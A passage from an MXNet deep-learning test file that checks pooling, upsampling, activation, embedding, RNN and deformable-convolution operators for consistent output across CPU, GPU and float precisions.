ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool'))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=False, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=False,
name='pool'))
check_consistency(sym_list, ctx_list)
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_3d_pooling(pool_type):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_3d_pooling('max')
test_3d_pooling('avg')
test_3d_pooling('sum')
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/8288")
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='lstm', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(100, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
